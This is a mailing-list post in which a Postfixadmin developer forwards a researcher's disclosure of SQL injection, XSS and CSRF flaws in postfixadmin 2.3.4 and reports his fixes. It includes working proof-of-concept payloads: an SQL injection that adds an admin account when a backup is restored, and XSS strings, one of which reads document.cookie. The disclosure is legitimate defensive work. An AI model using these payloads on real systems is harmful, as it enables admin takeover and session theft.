[Postfixadmin-devel] Fwd: Vulnerabilities in postfixadmin 2.3.4
Brought to you by:
christian_boltz,
gingerdog
Menu
▾
▴
[Postfixadmin-devel] Fwd: Vulnerabilities in postfixadmin 2.3.4
|
From: David G. <da...@co...> - 2012-01-10 16:11:00
|
Hi, I've fixed the problems in backup.php, edit-vacation.php (and template/smenu.php) and functions.inc.php Can you confirm/test my changes please? thanks David. Begin forwarded message: > From: Filippo Cavallarin <no...@so...> > Subject: Vulnerabilities in postfixadmin 2.3.4 > Date: 10 January 2012 15:22:09 GMT > To: GingerDog <gin...@us...> > > Hello, > I would like to inform You about some vulnerabilities I discovered in postfixadmin 2.3.4. > > 1) SQL injection in pacrypt function: if postfixadmin is configured with \'mysql_encrypt\' the > pacrypt function passes the $pw parameter to sql query without santitzing it allowing non- > admin users to perform sql injection attacks. > > > > 2) SQL injection in sql dump generated by backup.php: the backup.php file generates sql > queries without sanitizing values. A non-admin user can inject arbitrary sql commands > into backup file that will be executed when an admin restores that backup. To test this > issue try to set the vacation message of any user to: > > dontcare\',\'\',\'dominio.com\',\'2012-01-09 17:34:06\',\'1\'); > INSERT INTO admin (username,password,created,modified,active) > VALUES (\'so...@em...\',\'$1$2cab7a19$zIuOsr6PXksCu13883fVg/\',\'2012-01-08 > 15:48:19\',\'2012-01-09 17:17:55\',\'1\'); # > > then take a backup and restore it, the new admin so...@em... is added to admin > table. > > > > 3) Multiple XSS and lack of CSRF protection: I found several XSS in postfixadmin code. I > noted from postfixadmin homepage that you planned to merge it with Smarty wich could > provide a good protection against XSS and CSRF. BTW i report you some: > > Input passed via domain GET parameter to edit-vacation.php is not properly sanitised > before being returned to the user. > http://127.0.0.1/postfixadmin-2.3.4/edit-vacation.php?domain=dontcare</script> > <script>alert(1);</script> > > Input passed via fDomain POST parameter to create-domain.php is not properly > sanitised before being returned to the user. > This is interesting because the fDomain variable is passed to strip_tags so something like > on<a>click is trasformed to onclik. This allows to bypass browsers builtin XSS protection. > To test this issue put the following string as Domain parameter in create-domain.php, > submit the form and then click on Domain\'s input text.. > > dontcare\" oncli<a>ck=alert(document.cookie);// > > > > Best, > > Filippo Cavallarin > > > -- > This message was sent to your SourceForge.net email alias via the web mail form. You may reply to this message via https://sourceforge.net/sendmessage.php?touser=3692498 > To update your email alias preferences, please visit https://sourceforge.net/account |
